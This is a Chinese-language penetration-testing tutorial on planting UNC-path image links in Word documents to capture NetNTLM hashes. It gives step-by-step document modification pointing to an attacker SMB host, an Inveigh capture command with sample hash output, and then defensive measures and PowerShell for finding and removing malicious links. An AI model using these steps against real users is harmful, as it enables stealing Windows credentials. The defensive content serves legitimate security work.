利用Microsoft Word中的图像链接进行UNC路径注入渗透
字数 1021 2025-08-18 11:37:02
Microsoft Word UNC路径注入渗透技术详解
技术概述
UNC路径注入是一种利用Microsoft Word文档中图像链接功能来获取NetNTLM哈希的攻击技术。当受害者打开包含恶意UNC路径链接的Word文档时,系统会自动尝试访问攻击者控制的SMB共享,从而泄露用户的NTLMv2哈希凭证。
攻击原理
- UNC路径:通用命名约定路径(\server\share)用于访问网络资源
- NetNTLM哈希:Windows身份验证过程中传输的凭证哈希
- 自动解析:Word会自动解析文档中的所有链接,包括图像链接
所需工具
- Burp Suite Pro:用于协作客户端验证
- Inveigh/Responder:用于捕获NetNTLM哈希
- 7zip:用于修改Word文档内部结构
攻击步骤详解
方法一:通过Word界面插入恶意链接
- 打开Word文档,进入"插入"选项卡
- 点击"图片"图标
- 在文件名输入框中输入恶意UNC路径(如
\\attacker-ip\share\image.png) - 从"插入"下拉菜单中选择"链接到文件"
- 调整图像大小和布局以提高隐蔽性
- 保存文档
方法二:直接修改Word文档内部结构
- 使用7zip打开.docx文件(直接作为压缩包处理)
- 导航至
word/_rels/document.xml.rels文件 - 修改Target属性为攻击者的UNC路径(如
Target="file:///\\192.168.1.100\share\image.png") - 保存修改并更新到.docx文件中
捕获哈希
- 在攻击机器上启动Responder或Inveigh监听:
PS C:\> Invoke-Inveigh -NBNS N -LLMNR N -ConsoleOutput Y -IP 192.168.0.2 - 等待受害者打开文档,捕获NTLMv2哈希:
2017-12-19T17:23:19 SMB NTLMv2 challenge/response captured from 192.168.0.3(DESKTOP-2QRDJR2): Administrator::DESKTOP-2QRDJR2:57[TRUNCATED]cb:091[TRUNCATED]5BC:010[TRUNCATED]02E0032002E00310038003200000000000000000000000000
防御措施
-
网络层防御:
- 限制出站SMB流量(端口445/TCP)
- 启用SMB签名
-
系统层防御:
- 配置组策略禁用NTLMv1
- 启用SMBv3加密
-
用户教育:
- 不要打开来源不明的Word文档
- 注意文档中的异常图像或链接
-
技术控制:
- 使用Office受保护的视图
- 启用宏安全设置
高级技术:使用PowerShell枚举和修改Word关联
枚举文档关联目标
$file = "C:\path\to\doc.docx"
$word = New-Object -ComObject Word.Application
$doc = $word.documents.open($file)
$xml = New-Object System.XML.XMLDocument
$xml = $doc.WordOpenXML
$targets = $xml.package.part.xmlData.Relationships.Relationship
$targets | Format-Table
$word.Quit()
使用OpenXML库安全枚举(不触发请求)
[System.Reflection.Assembly]::LoadFrom("C:\DocumentFormat.OpenXml.dll")
$file = "C:\path\to\doc.docx"
$doc = [DocumentFormat.OpenXml.Packaging.WordprocessingDocument]::Open($file,$true)
$targets = $doc.MainDocumentPart.ExternalRelationships
$targets
$doc.Close()
删除恶意关联
$doc.MainDocumentPart.DeleteExternalRelationship("rId4")
总结
UNC路径注入攻击利用了Word文档处理外部资源的特性,具有高度隐蔽性,因为攻击会在用户无感知的情况下自动完成。防御需要多层次的安全措施,包括网络控制、系统加固和用户教育。